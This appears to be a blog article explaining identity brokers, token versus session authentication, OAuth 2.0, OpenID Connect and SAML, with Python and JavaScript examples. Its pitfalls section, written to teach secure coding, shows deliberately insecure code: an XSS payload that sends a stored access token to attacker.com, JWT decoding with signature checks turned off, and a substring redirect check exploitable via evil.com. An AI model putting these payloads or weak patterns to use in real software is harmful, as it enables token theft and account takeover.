Identity Broker: Centralizing Authentication in Distributed Systems

  1. Understanding Identity Brokers
  2. Token-Based vs Session-Based Authentication
  3. Protocol Choices: OAuth 2.0, SAML, and OpenID Connect
  4. Common Pitfalls and Security Issues
  5. Conclusion

Identity brokers emerged as a solution to authentication sprawl in distributed systems. Rather than each application managing its own user credentials and authentication logic, an identity broker centralizes these concerns, providing single sign-on (SSO) and unified identity management. However, this centralization introduces new architectural challenges: session management complexity, single points of failure, and the delicate balance between security and user experience.

This exploration examines identity broker patterns across enterprise systems, cloud applications, and microservices architectures. We’ll dissect common implementation approaches, evaluate protocol choices between OAuth 2.0, SAML, and OpenID Connect, and understand the trade-offs between token-based and session-based authentication. Drawing from real-world implementations and security incidents, we uncover why identity brokers are both essential and complex.

Understanding Identity Brokers

Before diving into implementation patterns, understanding what identity brokers do and why they exist is essential. An identity broker sits between your applications and identity providers, translating authentication protocols and managing user sessions.

The Core Problem: Authentication Sprawl

Without an identity broker, each application manages authentication independently:

🚫 Problems Without Identity Brokers

Credential Duplication

  • Users maintain separate credentials for each application
  • Password reuse across systems creates security risks
  • Password reset requires contacting each application
  • No unified password policy enforcement

Integration Complexity

  • Each application implements its own authentication
  • Multiple integrations with identity providers
  • Inconsistent security implementations
  • Difficult to add new identity providers

User Experience Issues

  • Users log in separately to each application
  • No single sign-on across systems
  • Session management inconsistencies
  • Logout doesn't propagate across applications

Identity brokers solve these problems by centralizing authentication logic and providing a unified interface to applications.

What Identity Brokers Provide

An identity broker acts as an intermediary between applications and identity providers:

🔑 Identity Broker Capabilities

Protocol Translation

  • Applications use one protocol (e.g., OAuth 2.0)
  • Identity providers use different protocols (SAML, LDAP, OAuth)
  • Broker translates between protocols
  • Applications don't need provider-specific code

Single Sign-On (SSO)

  • Users authenticate once with the broker
  • Broker issues tokens/sessions to applications
  • Applications trust the broker's authentication
  • Seamless access across multiple applications

Identity Federation

  • Connect multiple identity providers
  • Users can authenticate with corporate AD, Google, GitHub, etc.
  • Broker normalizes user attributes
  • Unified identity across providers

Session Management

  • Centralized session tracking
  • Single logout across all applications
  • Session timeout policies
  • Concurrent session control

Popular identity brokers include Keycloak, Auth0, Okta, Azure AD, and AWS Cognito.

Token-Based vs Session-Based Authentication

Identity brokers can implement authentication using tokens or sessions, each with distinct trade-offs.

Token-Based Authentication: Stateless and Scalable

Token-based authentication uses cryptographically signed tokens (typically JWTs) to represent authenticated users:

# Token-based authentication flow
from jose import jwt
from datetime import datetime, timedelta

class TokenAuthBroker:
    def __init__(self, secret_key):
        self.secret_key = secret_key
    
    def authenticate(self, username, password):
        # Verify credentials with identity provider
        if self.verify_credentials(username, password):
            # Issue JWT token
            payload = {
                'sub': username,
                'iat': datetime.utcnow(),
                'exp': datetime.utcnow() + timedelta(hours=1),
                'roles': self.get_user_roles(username)
            }
            token = jwt.encode(payload, self.secret_key, algorithm='HS256')
            return token
        return None
    
    def validate_token(self, token):
        try:
            payload = jwt.decode(token, self.secret_key, algorithms=['HS256'])
            return payload
        except jwt.ExpiredSignatureError:
            return None
        except jwt.JWTError:
            return None

# Application validates tokens without contacting broker
def protected_endpoint(request):
    token = request.headers.get('Authorization', '').replace('Bearer ', '')
    payload = broker.validate_token(token)
    
    if payload:
        return f"Welcome {payload['sub']}"
    return "Unauthorized", 401

✅ Token-Based Advantages

Stateless Architecture

  • No server-side session storage required
  • Applications validate tokens independently
  • Horizontal scaling without session replication
  • No session affinity needed in load balancers

Performance

  • No database lookup for each request
  • Validation is cryptographic signature check
  • Reduced latency for authentication checks
  • Lower load on identity broker

Microservices Friendly

  • Tokens passed between services
  • No shared session store required
  • Services validate tokens independently
  • Decoupled architecture

However, token-based authentication has significant drawbacks:

⚠️ Token-Based Challenges

Revocation Difficulty

  • Tokens valid until expiration
  • Cannot immediately revoke compromised tokens
  • Logout doesn't invalidate existing tokens
  • Requires token blacklist (defeats stateless benefit)

Token Size

  • JWTs contain user data and claims
  • Sent with every request
  • Larger than session IDs
  • Bandwidth overhead for mobile clients

Security Risks

  • Tokens stored in browser (XSS vulnerability)
  • Long-lived tokens increase exposure window
  • Token theft allows impersonation until expiration
  • Refresh token management complexity

Session-Based Authentication: Stateful but Controllable

Session-based authentication uses server-side sessions with session IDs sent to clients:

# Session-based authentication flow
import secrets
from datetime import datetime, timedelta

class SessionAuthBroker:
    def __init__(self):
        self.sessions = {}  # In production: Redis, database
    
    def authenticate(self, username, password):
        # Verify credentials with identity provider
        if self.verify_credentials(username, password):
            # Create session
            session_id = secrets.token_urlsafe(32)
            self.sessions[session_id] = {
                'username': username,
                'created': datetime.utcnow(),
                'expires': datetime.utcnow() + timedelta(hours=1),
                'roles': self.get_user_roles(username)
            }
            return session_id
        return None
    
    def validate_session(self, session_id):
        session = self.sessions.get(session_id)
        if session and session['expires'] > datetime.utcnow():
            return session
        return None
    
    def revoke_session(self, session_id):
        # Immediate revocation
        if session_id in self.sessions:
            del self.sessions[session_id]
            return True
        return False

# Application checks session with broker
def protected_endpoint(request):
    session_id = request.cookies.get('session_id')
    session = broker.validate_session(session_id)
    
    if session:
        return f"Welcome {session['username']}"
    return "Unauthorized", 401

✅ Session-Based Advantages

Immediate Revocation

  • Sessions stored server-side
  • Logout immediately invalidates session
  • Compromised sessions can be revoked instantly
  • Fine-grained session control

Smaller Client Storage

  • Only session ID sent to client
  • Minimal bandwidth overhead
  • User data stored server-side
  • Reduced XSS exposure

Flexible Session Management

  • Update session data without client changes
  • Track session activity and location
  • Implement concurrent session limits
  • Rich session metadata

Session-based authentication also has trade-offs:

⚠️ Session-Based Challenges

Scalability Complexity

  • Requires shared session store (Redis, database)
  • Session replication across servers
  • Load balancer session affinity or sticky sessions
  • Horizontal scaling more complex

Performance Overhead

  • Database lookup for each request
  • Network latency to session store
  • Higher load on identity broker
  • Potential bottleneck at scale

Distributed System Challenges

  • Microservices must call broker for validation
  • Network dependency for each request
  • Increased latency in service chains
  • Broker becomes critical dependency

Hybrid Approach: Short-Lived Tokens with Refresh Tokens

Many modern systems use a hybrid approach combining benefits of both:

# Hybrid authentication with access and refresh tokens
class HybridAuthBroker:
    def __init__(self, secret_key):
        self.secret_key = secret_key
        self.refresh_tokens = {}  # Server-side refresh token store
    
    def authenticate(self, username, password):
        if self.verify_credentials(username, password):
            # Short-lived access token (15 minutes)
            access_token = jwt.encode({
                'sub': username,
                'exp': datetime.utcnow() + timedelta(minutes=15),
                'type': 'access'
            }, self.secret_key, algorithm='HS256')
            
            # Long-lived refresh token (7 days) stored server-side
            refresh_token = secrets.token_urlsafe(32)
            self.refresh_tokens[refresh_token] = {
                'username': username,
                'expires': datetime.utcnow() + timedelta(days=7)
            }
            
            return {
                'access_token': access_token,
                'refresh_token': refresh_token,
                'expires_in': 900  # 15 minutes
            }
        return None
    
    def refresh_access_token(self, refresh_token):
        # Validate refresh token (server-side check)
        token_data = self.refresh_tokens.get(refresh_token)
        if token_data and token_data['expires'] > datetime.utcnow():
            # Issue new access token
            access_token = jwt.encode({
                'sub': token_data['username'],
                'exp': datetime.utcnow() + timedelta(minutes=15),
                'type': 'access'
            }, self.secret_key, algorithm='HS256')
            return access_token
        return None
    
    def logout(self, refresh_token):
        # Revoke refresh token
        if refresh_token in self.refresh_tokens:
            del self.refresh_tokens[refresh_token]

🎯 Hybrid Approach Benefits

Balanced Security

  • Short-lived access tokens limit exposure window
  • Compromised access token expires quickly
  • Refresh tokens can be revoked immediately
  • Logout invalidates refresh token

Performance and Scalability

  • Access tokens validated locally (stateless)
  • Refresh token checks infrequent (every 15 minutes)
  • Reduced load on identity broker
  • Scalable like token-based auth

User Experience

  • Seamless token refresh in background
  • No frequent re-authentication
  • Logout works immediately
  • Balance between security and convenience

This hybrid approach is used by OAuth 2.0 and OpenID Connect, representing industry best practices.

Protocol Choices: OAuth 2.0, SAML, and OpenID Connect

Identity brokers must support various authentication protocols. Understanding their differences is crucial for implementation decisions.

OAuth 2.0: Authorization Framework

OAuth 2.0 is an authorization framework, not an authentication protocol, though often used for both:

# OAuth 2.0 Authorization Code Flow
from flask import Flask, request, redirect
import requests

app = Flask(__name__)

BROKER_AUTH_URL = 'https://broker.example.com/oauth/authorize'
BROKER_TOKEN_URL = 'https://broker.example.com/oauth/token'
CLIENT_ID = 'your_client_id'
CLIENT_SECRET = 'your_client_secret'
REDIRECT_URI = 'https://app.example.com/callback'

@app.route('/login')
def login():
    # Redirect user to identity broker
    auth_url = f"{BROKER_AUTH_URL}?client_id={CLIENT_ID}&redirect_uri={REDIRECT_URI}&response_type=code&scope=openid profile email"
    return redirect(auth_url)

@app.route('/callback')
def callback():
    # Broker redirects back with authorization code
    code = request.args.get('code')
    
    # Exchange code for access token
    token_response = requests.post(BROKER_TOKEN_URL, data={
        'grant_type': 'authorization_code',
        'code': code,
        'redirect_uri': REDIRECT_URI,
        'client_id': CLIENT_ID,
        'client_secret': CLIENT_SECRET
    })
    
    tokens = token_response.json()
    access_token = tokens['access_token']
    
    # Use access token to get user info
    user_response = requests.get(
        'https://broker.example.com/userinfo',
        headers={'Authorization': f'Bearer {access_token}'}
    )
    
    user_info = user_response.json()
    # Create application session with user_info
    return f"Welcome {user_info['name']}"

📋 OAuth 2.0 Characteristics

Designed For

  • Delegated authorization
  • Third-party API access
  • Mobile and web applications
  • Modern REST APIs

Advantages

  • Simple HTTP-based protocol
  • Wide industry adoption
  • Mobile-friendly
  • Flexible grant types

Limitations

  • Not designed for authentication
  • No standard user info format
  • Requires additional profile endpoint
  • Token format not standardized

OpenID Connect: Authentication Layer on OAuth 2.0

OpenID Connect (OIDC) extends OAuth 2.0 specifically for authentication:

# OpenID Connect adds ID token to OAuth 2.0 flow
from jose import jwt

@app.route('/oidc-callback')
def oidc_callback():
    code = request.args.get('code')
    
    # Exchange code for tokens
    token_response = requests.post(BROKER_TOKEN_URL, data={
        'grant_type': 'authorization_code',
        'code': code,
        'redirect_uri': REDIRECT_URI,
        'client_id': CLIENT_ID,
        'client_secret': CLIENT_SECRET
    })
    
    tokens = token_response.json()
    id_token = tokens['id_token']  # OIDC adds ID token
    access_token = tokens['access_token']
    
    # Validate and decode ID token
    # ID token contains user identity claims
    user_claims = jwt.decode(
        id_token,
        key=get_broker_public_key(),
        algorithms=['RS256'],
        audience=CLIENT_ID
    )
    
    # ID token contains: sub, name, email, etc.
    return f"Welcome {user_claims['name']} ({user_claims['email']})"

✅ OpenID Connect Advantages

Purpose-Built for Authentication

  • ID token contains user identity
  • Standardized user claims
  • No additional profile endpoint needed
  • Clear authentication semantics

Security Features

  • ID token is signed JWT
  • Cryptographic validation
  • Audience and issuer validation
  • Nonce for replay protection

Industry Standard

  • Supported by all major identity providers
  • Extensive library support
  • Well-documented specifications
  • Active development and updates

SAML 2.0: Enterprise Standard

SAML (Security Assertion Markup Language) is the traditional enterprise authentication protocol:

# SAML 2.0 authentication flow (simplified)
from lxml import etree
from signxml import XMLVerifier

@app.route('/saml/login')
def saml_login():
    # Generate SAML authentication request
    saml_request = f"""
    <samlp:AuthnRequest xmlns:samlp="urn:oasis:names:tc:SAML:2.0:protocol"
                        ID="{generate_request_id()}"
                        Version="2.0"
                        IssueInstant="{datetime.utcnow().isoformat()}Z"
                        Destination="{BROKER_SSO_URL}">
        <saml:Issuer xmlns:saml="urn:oasis:names:tc:SAML:2.0:assertion">
            {SERVICE_PROVIDER_ID}
        </saml:Issuer>
    </samlp:AuthnRequest>
    """
    
    # Encode and redirect to identity broker
    encoded_request = base64.b64encode(saml_request.encode()).decode()
    sso_url = f"{BROKER_SSO_URL}?SAMLRequest={encoded_request}"
    return redirect(sso_url)

@app.route('/saml/acs', methods=['POST'])
def saml_assertion_consumer():
    # Broker posts SAML response back
    saml_response = request.form['SAMLResponse']
    decoded_response = base64.b64decode(saml_response)
    
    # Validate SAML assertion signature
    xml_doc = etree.fromstring(decoded_response)
    verified_data = XMLVerifier().verify(
        xml_doc,
        x509_cert=get_broker_certificate()
    ).signed_xml
    
    # Extract user attributes from assertion
    nameid = xml_doc.find('.//{urn:oasis:names:tc:SAML:2.0:assertion}NameID').text
    attributes = extract_saml_attributes(xml_doc)
    
    return f"Welcome {attributes['name']}"

🏢 SAML Characteristics

Designed For

  • Enterprise single sign-on
  • Federation between organizations
  • Legacy enterprise systems
  • Strong security requirements

Advantages

  • Mature and battle-tested
  • Rich attribute exchange
  • Strong security features
  • Enterprise adoption

Disadvantages

  • XML-based (verbose and complex)
  • Not mobile-friendly
  • Steep learning curve
  • Limited modern tooling

Protocol Selection Guide

🎯 Choosing the Right Protocol

Use OpenID Connect When:

  • Building new applications
  • Need mobile support
  • Want modern REST APIs
  • Require simple integration
  • Target consumer users

Use SAML When:

  • Integrating with enterprise systems
  • Required by corporate IT policies
  • Need rich attribute exchange
  • Federation with other organizations
  • Legacy system compatibility required

Use OAuth 2.0 When:

  • Need API authorization (not authentication)
  • Third-party access to resources
  • Delegated permissions
  • Combined with OIDC for authentication

Modern identity brokers like Keycloak support all three protocols, allowing applications to choose based on their needs.

Common Pitfalls and Security Issues

Identity broker implementations often suffer from common security vulnerabilities and design mistakes.

Pitfall 1: Storing Tokens in Local Storage

Many applications store tokens in browser local storage, creating XSS vulnerabilities:

// ❌ INSECURE: Storing tokens in local storage
function login(username, password) {
    fetch('/api/login', {
        method: 'POST',
        body: JSON.stringify({ username, password })
    })
    .then(res => res.json())
    .then(data => {
        // Vulnerable to XSS attacks
        localStorage.setItem('access_token', data.access_token);
        localStorage.setItem('refresh_token', data.refresh_token);
    });
}

// Any XSS vulnerability can steal tokens
// <script>
//   fetch('https://attacker.com/steal?token=' + localStorage.getItem('access_token'));
// </script>

🚫 Local Storage Vulnerabilities

XSS Attack Vector

  • JavaScript can access local storage
  • Any XSS vulnerability exposes tokens
  • Third-party scripts can steal tokens
  • No protection against script injection

Impact

  • Complete account takeover
  • Tokens valid until expiration
  • Attacker can impersonate user
  • Difficult to detect theft

Better approach using HTTP-only cookies:

// ✅ SECURE: Using HTTP-only cookies
// Server sets HTTP-only cookie (JavaScript cannot access)
@app.route('/api/login', methods=['POST'])
def login():
    data = request.json
    tokens = broker.authenticate(data['username'], data['password'])
    
    response = make_response({'status': 'success'})
    
    # HTTP-only cookie prevents JavaScript access
    response.set_cookie(
        'access_token',
        tokens['access_token'],
        httponly=True,  # Prevents JavaScript access
        secure=True,    # HTTPS only
        samesite='Strict'  # CSRF protection
    )
    
    return response

// Client-side: No token handling needed
function login(username, password) {
    fetch('/api/login', {
        method: 'POST',
        credentials: 'include',  // Send cookies
        body: JSON.stringify({ username, password })
    });
}

Pitfall 2: Missing Token Validation

Applications sometimes skip proper token validation:

# ❌ INSECURE: Trusting token without validation
@app.route('/api/user')
def get_user():
    token = request.headers.get('Authorization', '').replace('Bearer ', '')
    
    # Decoding without verification!
    payload = jwt.decode(token, options={"verify_signature": False})
    
    return {'user': payload['sub']}  # Attacker can forge tokens!

🚫 Validation Failures

Missing Signature Verification

  • Attacker can create fake tokens
  • No cryptographic validation
  • Complete authentication bypass

Missing Expiration Check

  • Expired tokens still accepted
  • Stolen tokens valid indefinitely
  • No time-based security

Missing Audience Validation

  • Tokens from other applications accepted
  • Cross-application token reuse
  • Privilege escalation risks

Proper token validation:

# ✅ SECURE: Complete token validation
from jose import jwt, JWTError

@app.route('/api/user')
def get_user():
    token = request.headers.get('Authorization', '').replace('Bearer ', '')
    
    try:
        payload = jwt.decode(
            token,
            key=get_public_key(),
            algorithms=['RS256'],  # Specify allowed algorithms
            audience='my-application',  # Validate audience
            issuer='https://broker.example.com'  # Validate issuer
        )
        
        # Token is valid and verified
        return {'user': payload['sub']}
        
    except jwt.ExpiredSignatureError:
        return {'error': 'Token expired'}, 401
    except jwt.JWTClaimsError:
        return {'error': 'Invalid claims'}, 401
    except JWTError:
        return {'error': 'Invalid token'}, 401

Pitfall 3: Insecure Redirect URIs

OAuth 2.0 redirect URI validation is critical for security:

# ❌ INSECURE: Weak redirect URI validation
@app.route('/oauth/authorize')
def authorize():
    client_id = request.args.get('client_id')
    redirect_uri = request.args.get('redirect_uri')
    
    # Weak validation: substring match
    if 'example.com' in redirect_uri:
        # Generate authorization code
        code = generate_auth_code(client_id)
        return redirect(f"{redirect_uri}?code={code}")
    
    return "Invalid redirect URI", 400

# Attacker can use: https://evil.com?victim=example.com
# Validation passes, code sent to attacker!

🚫 Redirect URI Vulnerabilities

Open Redirect

  • Authorization codes sent to attacker
  • Account takeover possible
  • Phishing attacks enabled

Subdomain Attacks

  • Weak validation allows subdomains
  • Attacker registers malicious subdomain
  • Steals authorization codes

Secure redirect URI validation:

# ✅ SECURE: Strict redirect URI validation
REGISTERED_CLIENTS = {
    'client123': {
        'redirect_uris': [
            'https://app.example.com/callback',
            'https://app.example.com/oauth/callback'
        ]
    }
}

@app.route('/oauth/authorize')
def authorize():
    client_id = request.args.get('client_id')
    redirect_uri = request.args.get('redirect_uri')
    
    # Exact match against registered URIs
    client = REGISTERED_CLIENTS.get(client_id)
    if not client or redirect_uri not in client['redirect_uris']:
        return "Invalid redirect URI", 400
    
    code = generate_auth_code(client_id)
    return redirect(f"{redirect_uri}?code={code}")

Conclusion

Identity brokers centralize authentication in distributed systems, providing single sign-on, protocol translation, and unified identity management. However, implementation choices significantly impact security, performance, and user experience.

The choice between token-based and session-based authentication involves fundamental trade-offs. Token-based authentication offers stateless scalability and microservices compatibility but struggles with revocation and security risks. Session-based authentication provides immediate revocation and fine-grained control but introduces scalability complexity. The hybrid approach using short-lived access tokens with server-side refresh tokens represents industry best practices, balancing security, performance, and user experience.

Protocol selection depends on your environment and requirements. OpenID Connect is the modern standard for new applications, offering simple integration, mobile support, and purpose-built authentication. SAML remains essential for enterprise integration and legacy systems despite its complexity. OAuth 2.0 serves authorization needs but requires OpenID Connect for proper authentication.

Common pitfalls plague identity broker implementations. Storing tokens in local storage creates XSS vulnerabilities—use HTTP-only cookies instead. Missing token validation allows attackers to forge tokens—always verify signatures, expiration, audience, and issuer. Weak redirect URI validation enables authorization code theft—use exact matching against registered URIs.

Identity brokers are essential infrastructure for modern distributed systems, but they require careful implementation. Understanding the trade-offs between authentication approaches, choosing appropriate protocols, and avoiding common security pitfalls ensures your identity broker enhances rather than undermines your security posture. The complexity is justified by the benefits: unified authentication, improved user experience, and centralized security controls across your entire application ecosystem.

Share